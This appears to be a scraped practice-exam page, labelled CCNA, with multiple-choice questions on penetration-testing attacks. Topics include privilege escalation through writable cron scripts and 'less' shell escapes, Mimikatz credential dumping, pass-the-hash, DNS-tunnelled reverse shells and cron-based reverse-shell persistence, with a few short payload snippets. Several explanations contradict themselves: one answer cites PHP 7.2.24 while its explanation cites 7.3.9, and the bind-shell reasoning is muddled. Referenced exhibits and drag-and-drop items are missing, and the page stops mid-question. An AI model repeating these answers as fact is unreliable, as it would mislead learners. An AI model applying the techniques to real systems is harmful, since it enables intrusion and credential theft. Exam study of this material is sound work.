CCNA Attacks And Exploits Questions

75 of 101 questions · Page 1/2 · Attacks And Exploits topic · Answers revealed

1
MCQeasy

A penetration tester is tasked with exploiting a web application that uses an insecure deserialization vulnerability. Which type of attack should the tester primarily use to execute arbitrary code on the server?

A.Cross-site scripting (XSS)
B.SQL injection
C.Malicious object deserialization
D.Cross-site request forgery (CSRF)
AnswerC

Insecure deserialization allows an attacker to supply crafted objects that execute arbitrary code upon deserialization.

Why this answer

Insecure deserialization vulnerabilities occur when an application deserializes untrusted data without proper validation, allowing an attacker to manipulate serialized objects. By crafting a malicious object (e.g., a PHP gadget chain or a Java serialized object with a custom readObject() method), the tester can trigger arbitrary code execution on the server during the deserialization process. This directly aligns with option C, as the attack vector is the deserialization of a malicious object.

Exam trap

CompTIA often tests the misconception that insecure deserialization is a form of injection (like SQLi or XSS), but the key distinction is that the attack exploits the deserialization process itself, not input validation or user-triggered actions.

How to eliminate wrong answers

Option A is wrong because cross-site scripting (XSS) exploits client-side script injection in the browser, not server-side code execution via deserialization. Option B is wrong because SQL injection targets database queries through input fields, not the deserialization of serialized objects. Option D is wrong because cross-site request forgery (CSRF) forces a user to perform unintended actions on a web application, not execute arbitrary code on the server through deserialization.

2
MCQhard

A penetration tester has gained a low-privileged shell on a Linux server. During enumeration, the tester finds a cron job that runs a script as root every five minutes. The script is located in /opt/backup.sh and is world-writable. Which technique should the tester use to escalate privileges?

A.Kernel exploit
B.SUID binary exploitation
C.Cron job script manipulation
D.Password cracking
AnswerC

Since the script is world-writable and run as root, the tester can insert a reverse shell or other commands to gain root access when the cron job fires.

Why this answer

Option C is correct because the cron job runs as root and the script /opt/backup.sh is world-writable, meaning any user can modify it. By injecting a reverse shell or privilege escalation command into the script, the tester can execute arbitrary code with root privileges when the cron job triggers. This is a classic cron job script manipulation attack, leveraging the scheduled task's root execution context.

Exam trap

The trap here is that candidates may overthink and choose a kernel exploit or SUID attack, overlooking the simpler and more direct vector of modifying a world-writable script executed by a privileged cron job.

How to eliminate wrong answers

Option A is wrong because kernel exploits target vulnerabilities in the Linux kernel to gain root, but the scenario provides a direct, simpler path via a writable cron script; kernel exploits are unnecessary and risk system instability. Option B is wrong because SUID binary exploitation involves finding a setuid-root binary that can be abused to run commands as root, but no such binary is mentioned; the vulnerability here is the writable script, not a misconfigured SUID file.

3
MCQhard

A penetration tester is attempting to exploit a buffer overflow vulnerability in a Linux binary. The binary has Data Execution Prevention (DEP) enabled but Address Space Layout Randomization (ASLR) is disabled. Which exploitation technique would be the MOST effective to achieve code execution?

A.Inject shellcode into the buffer and redirect execution to it
B.Use a ROP chain to call mprotect() to make the stack executable, then jump to shellcode
C.Perform a return-to-libc attack to call system("/bin/sh")
D.Use a heap spray to place shellcode at a known address and then trigger the overflow
AnswerC

Correct. Return-to-libc bypasses DEP by reusing existing executable code in libc. Without ASLR, addresses are predictable, making this straightforward.

Why this answer

With DEP enabled, the stack is non-executable, so injecting shellcode directly into the buffer (Option A) would fail. Since ASLR is disabled, library addresses are fixed, making a return-to-libc attack viable. Option C exploits this by overwriting the return address with the address of system() and placing the string "/bin/sh" in memory, achieving code execution without needing an executable stack.

Exam trap

The trap here is that candidates often assume DEP alone forces the use of ROP chains, but when ASLR is disabled, a simpler return-to-libc attack is more effective and directly achieves code execution without the complexity of building a ROP chain.

How to eliminate wrong answers

Option A is wrong because DEP marks the stack as non-executable, so any shellcode injected into the buffer will cause a segmentation fault when the CPU tries to execute it. Option B is wrong because while a ROP chain to call mprotect() could make the stack executable, it is more complex and unnecessary when ASLR is disabled; a simpler return-to-libc attack directly achieves code execution. Option D is wrong because heap spray is typically used to bypass ASLR by placing shellcode at a predictable heap address, but ASLR is already disabled, making this technique overcomplicated and less direct than a return-to-libc attack.

4
Matchingmedium

Match each reporting element to its description.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

High-level overview for non-technical management

Detailed steps and tools used during testing

List of vulnerabilities with severity ratings

Recommended actions to fix vulnerabilities

Raw logs, scripts, and supporting evidence

Why these pairings

A penetration testing report typically includes these sections.

5
MCQeasy

A penetration tester has gained administrative access to a Windows system and wants to extract NTLM password hashes from the memory of the Local Security Authority Subsystem Service (LSASS). Which tool is most commonly used for this purpose?

A.John the Ripper
B.Mimikatz
C.Hashcat
D.Netcat
AnswerB

Mimikatz is specifically designed to extract credentials from LSASS memory on Windows systems.

Why this answer

Mimikatz is the most commonly used tool for extracting NTLM password hashes from LSASS memory on a Windows system. It leverages the `sekurlsa::logonpasswords` module to read the LSASS process memory and decrypt stored credentials, including NTLM hashes, without requiring a separate brute-force or dictionary attack.

Exam trap

The trap here is that candidates confuse hash extraction tools (Mimikatz) with hash cracking tools (John the Ripper, Hashcat), assuming any tool that works with hashes can also extract them from memory.

How to eliminate wrong answers

Option A is wrong because John the Ripper is a password cracking tool that operates on already-extracted hash files (e.g., NTLM hashes saved to a file), not a tool for extracting hashes from LSASS memory. Option C is wrong because Hashcat is a GPU-accelerated password recovery tool that cracks hashes from a provided hash list, but it cannot directly access or extract hashes from a running Windows process like LSASS.

6
MCQmedium

A penetration tester has compromised a host and wants to move laterally to a server using pass-the-hash. Which of the following is required for a successful pass-the-hash attack against a Windows target?

A.The target must have SMB signing enabled
B.The target must have the same local admin password hash
C.The target must have a user account with the same password
D.The target must have the same machine account hash
AnswerB

If the local admin account on the target has the same hash, the attacker can authenticate using that hash.

Why this answer

Pass-the-hash (PtH) attacks exploit the NTLM challenge-response authentication mechanism. When a target has the same local administrator password hash as the compromised host, the attacker can use the captured hash to authenticate to the target without knowing the plaintext password. This works because Windows caches the password hash in LSASS, and tools like Mimikatz can extract it for replay.

Exam trap

Cisco often tests the misconception that pass-the-hash requires the plaintext password or that SMB signing is a prerequisite, when in fact the hash alone suffices and SMB signing would block the attack.

How to eliminate wrong answers

Option A is wrong because SMB signing, when enabled, would actually prevent pass-the-hash by requiring packet integrity verification; disabling SMB signing is a common prerequisite for PtH. Option C is wrong because pass-the-hash does not require the same plaintext password—it uses the password hash directly, bypassing the need for the actual password.

7
Drag & Dropmedium

Drag and drop the steps to perform a web application fuzzing using Burp Suite Intruder into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

Fuzzing involves proxy setup, parameter identification, payload configuration, attack execution, and analysis.

8
MCQeasy

While performing a password audit, a tester finds that the hash of 'Password123' is stored in the LAN Manager (LM) hash format. What is the primary security weakness of LM hashes?

A.The password is split into two 7-character halves
B.The hash is case-sensitive
C.The hash is salted with a weak random value
D.The hash uses the MD4 hashing algorithm
AnswerA

This reduces keyspace to two 7-character halves, easily brute-forced.

Why this answer

The primary security weakness of LAN Manager (LM) hashes is that the password is converted to uppercase, padded or truncated to 14 characters, and then split into two 7-character halves. Each half is hashed independently using DES as the key for a known constant, which means an attacker can brute-force each 7-character half separately, drastically reducing the keyspace from 14 characters to two sets of 7 characters. This makes LM hashes extremely vulnerable to offline cracking, especially with modern tools like John the Ripper or Hashcat.

Exam trap

The trap here is that candidates often confuse LM hashes with NTLM hashes, incorrectly associating the weakness with MD4 (which is used by NTLM) or salting, when the real vulnerability is the split into two 7-character halves that can be attacked independently.

How to eliminate wrong answers

Option B is wrong because LM hashes are actually case-insensitive — the password is uppercased before hashing, so case sensitivity is not a weakness; rather, the lack of case sensitivity reduces entropy. Option C is wrong because LM hashes are not salted at all; they use a static constant (KGS!@#$%) as the DES key input, making precomputed rainbow tables highly effective. Option D is wrong because LM hashes use DES, not MD4; the MD4 algorithm is used in NTLM hashes, which are a separate and more secure replacement for LM.

9
MCQmedium

A penetration tester has gained a shell on a Linux machine as a low-privileged user. The user can execute the binary 'less' with sudo privileges without a password. Which technique can the tester use to escalate privileges to root?

A.Exploit a buffer overflow in the 'less' binary.
B.Use the '!' command within 'less' to execute a shell.
C.Run 'sudo -u root bash' to switch to a root shell.
D.Modify the PATH to trick sudo into running a malicious binary.
AnswerB

Correct. The '!' command in less allows execution of shell commands. With sudo, this runs as root, granting privilege escalation.

Why this answer

The 'less' binary, when executed with sudo, retains its ability to spawn a shell via the '!' command. Since the user can run 'less' as root without a password, typing '!/bin/bash' (or simply '!bash') inside 'less' will execute a shell with root privileges, effectively escalating to root.

Exam trap

The trap here is that candidates may overlook the shell escape feature of pagers like 'less' and instead assume they need to exploit a binary vulnerability or use a generic 'sudo -u root bash' command, which fails because the sudoers rule is specific to 'less' only.

How to eliminate wrong answers

Option A is wrong because exploiting a buffer overflow in 'less' is unnecessary and impractical; the intended privilege escalation vector is the built-in '!' command, not a memory corruption vulnerability. Option C is wrong because 'sudo -u root bash' requires the user to have explicit sudo permissions for 'bash', which they do not; the sudoers entry only grants passwordless execution of 'less', not arbitrary commands.

10
MCQhard

A penetration tester discovers a remote command injection vulnerability in a Java-based web application on a Windows server. The tester wants to execute a PowerShell reverse shell. Which encoding technique is most effective to avoid filter restrictions on special characters?

A.Base64 encoding
B.URL encoding
C.Unicode encoding
D.Hex encoding
AnswerA

PowerShell supports -EncodedCommand, allowing the entire command to be Base64-encoded, which evades many filter restrictions on special characters.

Why this answer

Base64 encoding is the most effective technique because it allows the tester to encode the entire PowerShell command, including special characters like semicolons, pipes, and quotes, into a safe ASCII string that bypasses filter restrictions. PowerShell natively supports the `-EncodedCommand` parameter, which decodes Base64 input directly, making it ideal for remote command injection scenarios where character filtering is strict.

Exam trap

The trap here is that candidates often choose URL encoding because it is familiar from web attacks, but they overlook that PowerShell's `-EncodedCommand` parameter is specifically designed for Base64, making it the most direct and filter-evading method for remote command injection on Windows.

How to eliminate wrong answers

Option B (URL encoding) is wrong because it only encodes individual characters (e.g., %20 for space) and does not prevent filters that block specific special characters like semicolons or pipes; many web application firewalls still inspect decoded content. Option C (Unicode encoding) is wrong because it is not natively supported by PowerShell's command-line parsing for direct execution; PowerShell expects UTF-16LE for `-EncodedCommand`, not general Unicode encoding. Option D (Hex encoding) is wrong because PowerShell does not have a built-in parameter to decode hex-encoded commands directly; the tester would need additional conversion steps, making it less efficient and more likely to be blocked.

11
MCQhard

A penetration tester discovers a web application that uses client-side JavaScript to validate user input before form submission. The input is then sent to the server and used directly in a SQL query without server-side validation. Which attack would most effectively exploit this vulnerability?

A.SQL injection
B.Cross-site scripting (XSS)
C.Command injection
D.Parameter pollution
AnswerA

Client-side validation is easily bypassed; by sending malicious SQL payloads directly to the server, the tester can manipulate the database query.

Why this answer

The correct answer is A because the vulnerability described—client-side JavaScript validation with no server-side sanitization, followed by direct use of input in a SQL query—is the classic precondition for SQL injection. An attacker can bypass client-side controls (e.g., by disabling JavaScript or using a proxy like Burp Suite) and submit crafted SQL syntax (e.g., `' OR 1=1 --`) to manipulate the query, extract data, or execute arbitrary SQL commands on the database server.

Exam trap

The trap here is that candidates may confuse client-side validation bypass with XSS, thinking that JavaScript injection is the primary risk, but the key is that the input flows directly into a SQL query, making SQL injection the most effective and direct attack.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) exploits the injection of client-side scripts into web pages viewed by other users, not the manipulation of SQL queries on the server; the described scenario involves direct server-side SQL execution, not reflected or stored output in a browser. Option C is wrong because command injection targets operating system commands via shell execution (e.g., through `exec()` or `system()` calls), not SQL queries; the input is used in a SQL query, not a system command. Option D is wrong because parameter pollution involves manipulating HTTP parameters (e.g., duplicate `id` parameters) to override or confuse server-side logic, but it does not directly exploit SQL query construction from unsanitized input.

12
MCQeasy

A penetration tester has compromised a Linux server and gained a low-privilege shell. The tester discovers that the /etc/shadow file is readable by the tester's user. Which attack is most directly enabled by this finding?

A.Pass-the-hash
B.Password cracking offline
C.LLMNR poisoning
D.Kerberoasting
AnswerB

Reading /etc/shadow directly enables offline password cracking because the hashes can be extracted and attacked with tools like John the Ripper or Hashcat.

Why this answer

The /etc/shadow file contains the hashed passwords for all users on the system. If a low-privilege user can read this file, they can copy the password hashes and attempt to crack them offline using tools like John the Ripper or Hashcat. This directly enables an offline password cracking attack, as the tester can brute-force or use dictionary attacks against the hashes without needing to interact with the live system.

Exam trap

The trap here is that candidates may confuse the ability to read a password hash file with a pass-the-hash attack, but pass-the-hash is a Windows-specific technique that requires NTLM hashes and a network authentication context, not a local file read on Linux.

How to eliminate wrong answers

Option A is wrong because pass-the-hash is an attack that uses captured NTLM hashes to authenticate to Windows systems, not Linux systems; it requires a Windows environment and does not apply to reading /etc/shadow. Option C is wrong because LLMNR poisoning is a Windows-specific network attack that exploits the Link-Local Multicast Name Resolution protocol to capture NetNTLMv2 hashes, and it is not related to reading a local file on a Linux server. Option D is wrong because Kerberoasting targets Kerberos service tickets in Active Directory environments to crack service account passwords; it is a Windows domain attack and does not involve the /etc/shadow file on a Linux server.

13
MCQmedium

During a web application test, a penetration tester discovers that the application exposes internal object references (e.g., user ID in a URL) and does not properly authorize access. The tester can view other users' private data by simply changing the ID parameter. Which type of vulnerability does this represent?

A.Cross-Site Request Forgery (CSRF)
B.Insecure Direct Object Reference (IDOR)
C.SQL Injection
D.Cross-Site Scripting (XSS)
AnswerB

Correct. The scenario describes exactly this: direct manipulation of an object reference (user ID) to access other users' data without proper authorization.

Why this answer

The vulnerability is Insecure Direct Object Reference (IDOR) because the application exposes internal object references (e.g., user ID in a URL) and fails to enforce proper authorization checks. By simply changing the ID parameter, the tester can access other users' private data without authentication or permission validation, which is the hallmark of IDOR.

Exam trap

CompTIA often tests IDOR by presenting a scenario where a parameter is manipulated to access another user's data, and the trap is confusing it with CSRF (which involves state-changing actions via forged requests) or SQL injection (which involves database query manipulation), rather than recognizing the core issue as missing authorization on direct object references.

How to eliminate wrong answers

Option A is wrong because Cross-Site Request Forgery (CSRF) involves tricking a user into executing unwanted actions on a web application where they are authenticated, not directly manipulating object references to access unauthorized data. Option C is wrong because SQL Injection is a code injection technique that exploits insecure database queries by inserting malicious SQL statements, not by manipulating exposed object references in URLs or parameters.

14
MCQhard

Refer to the exhibit. The firewall rules shown are in effect. A tester has compromised a host at 192.168.1.100 and wants to exfiltrate data to an external server. Which technique will most likely succeed?

A.Use DNS tunneling to an external DNS server
B.Send data over HTTPS to an external server
C.Exfiltrate via HTTP to an external server
D.Initiate an RDP connection to the external server
AnswerB

Outbound HTTPS to any destination is allowed, making this the best choice.

Why this answer

Option B is correct because HTTPS (TCP/443) is typically allowed through firewalls for web traffic, and the encrypted payload can bypass deep packet inspection. The compromised host at 192.168.1.100 can initiate an outbound HTTPS connection to an external server, making data exfiltration over HTTPS the most likely to succeed given the firewall rules.

Exam trap

The trap here is that candidates may assume DNS tunneling is stealthy because it uses a common protocol, but they overlook that firewalls often allow HTTPS by default while DNS traffic is more closely monitored for anomalies.

How to eliminate wrong answers

Option A is wrong because DNS tunneling relies on UDP/53 traffic, which is often monitored for anomalous query patterns or blocked by security controls like DNS sinkholing or rate limiting, making it less reliable than HTTPS. Option C is wrong because HTTP (TCP/80) is frequently inspected or blocked by modern firewalls and proxies, and unencrypted traffic can be easily detected or filtered. Option D is wrong because RDP (TCP/3389) is a remote management protocol that is typically blocked at the perimeter firewall to prevent unauthorized remote access, and it is not designed for stealthy data exfiltration.

15
MCQmedium

A penetration tester has compromised a Linux web server via a remote file inclusion vulnerability. The tester wants to maintain persistent access on the system. Which technique is MOST reliable for persistence on a Linux system?

A.Adding a cron job to run a reverse shell every minute
B.Creating a local user account with UID 0
C.Modifying the sudoers file to grant the tester sudo access
D.Installing a kernel module rootkit
AnswerA

Cron jobs are simple, reliable, and persist across reboots.

Why this answer

A cron job is the most reliable persistence mechanism because it operates independently of user login sessions, runs with root privileges if configured in the root crontab, and can execute a reverse shell at a fixed interval (e.g., every minute). Unlike user accounts or sudoers modifications, a cron job does not require the attacker to maintain an active session or rely on system services that may be monitored or disabled.

Exam trap

The trap here is that candidates may assume creating a root-equivalent user (UID 0) is stealthy, but in practice it is easily detected by auditing tools and log reviews, whereas a cron job blends in with normal system activity and provides automated, recurring access.

How to eliminate wrong answers

Option B is wrong because creating a local user account with UID 0 (root) is highly visible in /etc/passwd and /etc/shadow, and many security tools and system administrators actively monitor for unauthorized UID 0 accounts. Option C is wrong because modifying the sudoers file grants sudo access but does not provide persistence; the tester would still need an active session or another method to regain access if the current session is lost.

16
Multi-Selecthard

A penetration tester is assessing a wireless network's security. The tester wants to capture WPA2 handshakes for offline password cracking. Which two attacks can be used to force a client to re-authenticate and capture the handshake? (Choose TWO.)

Select 2 answers
A.Rogue DHCP server attack
B.ARP poisoning attack
C.Evil twin attack
D.Disassociation attack
E.Deauthentication attack
AnswersD, E

Disassociation frames also disconnect clients, prompting reconnection and handshake capture.

Why this answer

A deauthentication attack (Option E) sends deauth frames from the access point to the client, forcing it to disconnect and reconnect, thereby generating a new WPA2 4-way handshake. A disassociation attack (Option D) similarly sends disassociation frames to break the client's connection, prompting re-authentication. Both attacks exploit management frame vulnerabilities in 802.11 to capture the handshake for offline cracking.

Exam trap

CompTIA often tests the distinction between deauthentication and disassociation attacks as both valid methods, while candidates may mistakenly think only one is correct or confuse them with ARP poisoning or evil twin attacks.

17
MCQmedium

A penetration tester has gained initial access to a Linux server through a vulnerable web application. The server has a restrictive outbound firewall that only allows traffic on ports 80, 443, and 53. The tester wants to establish a reverse shell that is likely to bypass the firewall. Which of the following techniques would be most effective?

A.Use a reverse shell listener on TCP port 3389 and connect from the target
B.Use a bind shell on the target's port 4444 and connect directly
C.Use a reverse shell over DNS by encoding commands in DNS queries
D.Use a reverse shell on TCP port 8080 and hope it is not blocked
AnswerC

DNS traffic (UDP 53) is often allowed outbound for name resolution. Tools like dnscat2 can encapsulate data in DNS packets, enabling a reverse shell that can bypass the firewall.

Why this answer

Option C is correct because DNS traffic on port 53 is typically allowed through restrictive outbound firewalls, and encoding reverse shell commands within DNS queries allows the tester to tunnel traffic over DNS, bypassing the firewall's port restrictions. Tools like dnscat2 or iodine can encapsulate TCP data in DNS requests, making the reverse shell appear as legitimate DNS traffic.

Exam trap

The trap here is that candidates may assume a reverse shell on a non-standard port (like 3389) will work because it's a common service port, but the firewall's explicit allow list (80, 443, 53) makes any other port blocked, and DNS tunneling is the only technique that leverages an allowed protocol for covert communication.

How to eliminate wrong answers

Option A is wrong because TCP port 3389 is used for RDP (Remote Desktop Protocol), which is not a standard outbound port allowed by the firewall (only ports 80, 443, and 53 are allowed), and even if it were, a reverse shell listener on that port would still be blocked by the firewall. Option B is wrong because a bind shell opens a listening port on the target (port 4444), but the restrictive outbound firewall does not block inbound connections; the issue is that the tester cannot initiate a direct connection to the target from outside due to the firewall's outbound rules, and the bind shell requires the tester to connect to the target, which is not possible if the target is behind NAT or has no direct route.

18
MCQhard

A penetration tester has gained a foothold on a Linux server through a vulnerable web application. The server has an outbound firewall that blocks all traffic except DNS queries (UDP 53). The tester needs to establish a reverse shell to maintain access. Which technique is most likely to succeed?

A.Use a bind shell on a high TCP port and connect from the tester's machine
B.Encode the payload in Base64 and use DNS tunneling to execute commands
C.Attempt a reverse shell over HTTP using TCP port 80
D.Use SSH reverse port forwarding to the tester's server on port 443
AnswerB

DNS tunneling can encode arbitrary data within DNS queries, which are allowed through the firewall, and can be used to establish a two-way communication channel, enabling a reverse shell.

Why this answer

Option B is correct because DNS tunneling encapsulates non-DNS traffic (e.g., command output) within DNS query and response packets, which are allowed through the firewall on UDP port 53. This technique bypasses the outbound firewall restriction by making the malicious traffic appear as legitimate DNS queries, enabling the tester to execute commands and exfiltrate data without triggering network-level blocks.

Exam trap

The trap here is that candidates assume a reverse shell over HTTP (TCP 80) will work because HTTP is commonly allowed, but the question explicitly states the firewall blocks all traffic except DNS queries (UDP 53), making TCP-based reverse shells fail regardless of the port.

How to eliminate wrong answers

Option A is wrong because a bind shell opens a listening port on the target server, but the outbound firewall blocks all traffic except DNS queries, so the tester cannot initiate a connection from their machine to the target's high TCP port; the firewall would drop the inbound connection attempt. Option C is wrong because a reverse shell over HTTP using TCP port 80 would require the target server to initiate an outbound TCP connection, but the firewall blocks all outbound traffic except UDP 53, so the TCP SYN packet would be dropped by the firewall.

19
MCQeasy

A penetration tester is performing a client-side attack against a user. The tester sends an email with a malicious attachment that, when opened, executes a macro that downloads a payload. Which type of attack is this?

A.Spear phishing
B.Vishing
C.Smishing
D.Watering hole
AnswerA

This is the correct answer because the attack targets a specific user via email with a malicious attachment, which is the definition of spear phishing.

Why this answer

Spear phishing is a targeted phishing attack where the attacker crafts a personalized email to a specific individual or organization, often including a malicious attachment. In this scenario, the email with a macro-enabled attachment that downloads a payload is a classic spear phishing technique, as it exploits human trust and social engineering to deliver malware. This contrasts with generic phishing, which casts a wide net, and the client-side attack vector relies on the user executing the macro.

Exam trap

The trap here is that candidates confuse spear phishing with generic phishing or social engineering categories like vishing/smishing, but the key differentiator is the use of a personalized email with a malicious attachment, not the delivery medium (voice or SMS).

How to eliminate wrong answers

Option B (Vishing) is wrong because vishing (voice phishing) uses telephone calls or voice messages to trick victims into revealing sensitive information, not email attachments with macros. Option C (Smishing) is wrong because smishing (SMS phishing) uses text messages or SMS to deliver malicious links or requests, not email attachments with macros.

20
MCQeasy

A penetration tester has physical access to a small office. The network switch is in a locked cabinet, but the tester notices the lock is broken. The switch has multiple ports, and the tester wants to connect to the internal network. The tester has a laptop with an Ethernet port. However, the tester suspects that port security is enabled on the switch ports, which would block the connection if the MAC address is not authorized. Which action should the tester take first to gain network access?

A.Perform a MAC flooding attack to fill the switch's MAC table.
B.Use a DHCP starvation attack to exhaust IP addresses.
C.Plug the laptop into an available switch port.
D.Connect to the switch's console port and attempt default credentials.
AnswerD

If successful, the tester can disable port security or add their MAC address as authorized, gaining network access.

Why this answer

Option D is correct because the tester has physical access to the switch and the lock is broken, allowing direct console access. If port security is enabled, plugging into a data port (Option C) would be blocked. The fastest first step is to connect to the console port and try default credentials (e.g., cisco/cisco) to gain administrative control of the switch, which can then be used to disable port security or add the tester's MAC address to the allowed list.

Exam trap

The trap here is that candidates assume physical access to a switch port means they can simply plug in (Option C), but Cisco exams emphasize that port security is a common Layer 2 control that must be bypassed via management access first, not by attacking the data plane.

How to eliminate wrong answers

Option A is wrong because a MAC flooding attack aims to overflow the switch's CAM table, forcing it into hub mode (flooding traffic out all ports), but it does not bypass port security—the tester's own MAC would still be unauthorized and the port would be err-disabled or blocked. Option B is wrong because a DHCP starvation attack exhausts the DHCP pool to cause a denial of service or force clients to use a rogue DHCP server; it does not grant the tester network access through a port-secured switch port. Option C is wrong because if port security is enabled with MAC address filtering, plugging directly into an available port will trigger a security violation (e.g., shutdown, restrict, or protect mode), blocking the tester's connection immediately.

21
MCQmedium

A penetration tester has gained access to a Windows workstation and extracted NTLM password hashes. The tester wants to move laterally to a server that authenticates using NTLM. The tester does not have the plaintext passwords. Which technique is MOST appropriate to authenticate to the server using the captured hashes?

A.Pass-the-hash
B.Brute force
C.Rainbow tables
D.Keylogging
AnswerA

Pass-the-hash uses the captured NTLM hash to authenticate to remote services without needing the plaintext password.

Why this answer

Pass-the-hash (PtH) is the correct technique because it allows the tester to authenticate to the remote server using the captured NTLM hash directly, without needing the plaintext password. NTLM authentication uses a challenge-response protocol where the hash itself is the secret; by presenting the hash in the response, the tester can impersonate the user. This is a well-known lateral movement technique in Windows environments, often executed with tools like Mimikatz (sekurlsa::pth) or Impacket's wmiexec.py.

Exam trap

The trap here is that candidates may think they need the plaintext password for authentication and choose brute force or rainbow tables, not realizing that NTLM authentication accepts the hash directly in the challenge-response exchange, making pass-the-hash the most efficient lateral movement technique.

How to eliminate wrong answers

Option B (Brute force) is wrong because brute force attempts to guess the plaintext password by trying many combinations, which is computationally expensive and time-consuming; the tester already has the hash and does not need the plaintext for NTLM authentication. Option C (Rainbow tables) is wrong because rainbow tables are precomputed tables used to reverse a hash into a plaintext password, which is unnecessary here since the hash itself can be used directly for authentication via pass-the-hash; additionally, rainbow tables are ineffective against salted hashes or modern NTLM hashes without significant precomputation.

22
MCQmedium

A penetration tester has captured NTLM hashes from a compromised machine and wants to move laterally to a server that requires NTLM authentication. The tester does not have the plaintext password. Which attack technique is MOST appropriate for authenticating using the captured hashes?

A.Brute force the password from the hash
B.Pass-the-hash
C.NTLM relay
D.Kerberoasting
AnswerB

Pass-the-hash uses the NTLM hash to authenticate without needing the plaintext password, enabling lateral movement.

Why this answer

Pass-the-hash (PtH) is the most appropriate technique because it allows the tester to authenticate to the target server using the captured NTLM hash directly, without needing the plaintext password. NTLM authentication uses the hash as a secret, so the hash can be passed to the server in the challenge-response handshake. This is a well-known lateral movement technique in Windows environments.

Exam trap

CompTIA often tests the distinction between pass-the-hash and NTLM relay, where candidates confuse the need for an active relay target versus simply using a captured hash to authenticate directly.

How to eliminate wrong answers

Option A is wrong because brute-forcing the password from the hash is computationally expensive and time-consuming, especially for strong passwords, and is not the most efficient method for immediate lateral movement. Option C is wrong because NTLM relay involves intercepting and forwarding an authentication attempt from a client to a server, not using a pre-captured hash to authenticate directly; it requires an active connection from another machine.

23
MCQmedium

During a web application penetration test, a tester identifies a potential SQL injection vulnerability in a search field. The tester wants to extract data from the database without generating error messages that could trigger an alert. Which technique is most appropriate?

A.In-band SQL injection
B.Error-based SQL injection
C.Blind SQL injection (time-based)
D.Union-based SQL injection
AnswerC

Time-based blind injection uses time delays to infer data without generating errors, making it stealthy.

Why this answer

Option C is correct because blind SQL injection (time-based) allows data extraction without generating visible error messages or database output. By using conditional time delays (e.g., IF condition THEN WAITFOR DELAY '0:0:5' in SQL Server or SLEEP(5) in MySQL), the tester can infer true/false conditions based on response timing, avoiding any error-based alerts that might be monitored by a WAF or IDS.

Exam trap

The trap here is that candidates often choose error-based or union-based injection because they are more familiar, failing to recognize that the question explicitly requires avoiding error messages and alerts, which only time-based blind injection achieves.

How to eliminate wrong answers

Option A is wrong because in-band SQL injection relies on the same channel to both inject and retrieve data (e.g., via UNION or error messages), which would produce visible output or errors that could trigger alerts. Option B is wrong because error-based SQL injection deliberately forces database errors to extract information from error messages, directly generating alerts. Option D is wrong because union-based SQL injection requires the attacker to see the results of a UNION query in the application response, which would expose the attack and potentially trigger monitoring systems.

24
MCQeasy

A penetration tester is planning a social engineering campaign against a corporation. The goal is to trick the CEO into revealing sensitive information. Which type of attack should the tester use?

A.Vishing
B.Spear phishing
C.Pharming
D.Whaling
AnswerD

Whaling is a form of spear phishing that targets senior executives such as CEOs, making it the correct choice for this scenario.

Why this answer

Whaling is a targeted form of phishing that specifically focuses on high-profile individuals, such as the CEO. In this scenario, the goal is to trick the CEO into revealing sensitive information, making whaling the correct choice because it is designed to impersonate trusted entities or create urgent scenarios to deceive senior executives.

Exam trap

CompTIA often tests the distinction between spear phishing and whaling, where the trap is that candidates choose spear phishing because it is a broader term, but the question's focus on a CEO specifically requires the more precise 'whaling' classification.

How to eliminate wrong answers

Option A is wrong because vishing (voice phishing) uses phone calls or voice messages, not email or other digital messages, and while it could target a CEO, the question implies a digital attack vector. Option B is wrong because spear phishing targets specific individuals or groups but is not exclusively reserved for high-level executives like a CEO; whaling is the more precise term for targeting C-suite personnel. Option C is wrong because pharming redirects users from legitimate websites to fraudulent ones by exploiting DNS vulnerabilities or local host file manipulation, and it does not involve directly tricking an individual via email or messaging.

25
MCQmedium

A penetration tester is exploiting a web application that stores session tokens in HTTP cookies without the HttpOnly flag. Which attack is most likely to succeed?

A.SQL injection
B.Session hijacking through cross-site scripting
C.Cross-site request forgery
D.Server-side request forgery
AnswerB

XSS can read cookie values if HttpOnly is not set, allowing session theft.

Why this answer

The absence of the HttpOnly flag on session cookies allows client-side scripts (e.g., JavaScript) to access the cookie. An attacker can exploit a cross-site scripting (XSS) vulnerability to execute arbitrary JavaScript in the victim's browser, which then reads the session cookie and sends it to the attacker. This enables session hijacking without needing to guess or brute-force the token.

Exam trap

The trap here is that candidates often confuse session hijacking via XSS with CSRF, but CSRF does not steal the token—it only abuses the existing authenticated session to perform actions.

How to eliminate wrong answers

Option A is wrong because SQL injection targets the database layer by manipulating SQL queries, not the client-side storage of session tokens. Option C is wrong because cross-site request forgery (CSRF) forces the victim to perform unintended actions using their existing session, but it does not steal the session token itself. Option D is wrong because server-side request forgery (SSRF) tricks the server into making internal requests, not stealing client-side cookies.

26
MCQmedium

Refer to the exhibit. A penetration tester performed a port scan and collected the information shown. Which vulnerability is most likely present based on the software versions?

A.Sendmail remote code execution
B.OpenSSH user enumeration
C.Apache HTTP Server directory traversal
D.PHP CGI argument injection (CVE-2019-11043)
AnswerD

PHP 7.2.24 is vulnerable to CVE-2019-11043 which allows remote code execution via specially crafted paths.

Why this answer

The exhibit shows Apache/2.4.39 with PHP 7.3.9, which is vulnerable to CVE-2019-11043, a PHP CGI argument injection flaw. This vulnerability allows an attacker to send specially crafted query strings to a PHP-FPM server via the `PATH_INFO` parameter, leading to remote code execution. The specific software versions match the known affected range (PHP 7.3.x before 7.3.11 and Apache with mod_proxy_fcgi).

Exam trap

The trap here is that candidates see 'Apache' and 'PHP' and immediately think of directory traversal (Option C), but the specific version numbers (Apache 2.4.39, PHP 7.3.9) are the key to identifying the PHP CGI argument injection vulnerability, not a generic Apache flaw.

How to eliminate wrong answers

Option A is wrong because Sendmail remote code execution typically targets older Sendmail versions (e.g., 8.x) and is not directly associated with Apache or PHP version indicators from a port scan. Option B is wrong because OpenSSH user enumeration exploits timing differences in SSH authentication, which requires SSH service banners (port 22), not HTTP server headers. Option C is wrong because Apache HTTP Server directory traversal vulnerabilities (e.g., CVE-2021-41773) affect Apache 2.4.49 or 2.4.50, not the 2.4.39 version shown in the exhibit.

27
MCQeasy

Refer to the exhibit. A penetration tester sends the request and receives the response shown. Which vulnerability is confirmed?

A.Server-side request forgery
B.Cross-site request forgery
C.SQL injection
D.Reflected cross-site scripting
AnswerD

The input is echoed back in the HTML without sanitization, allowing script execution.

Why this answer

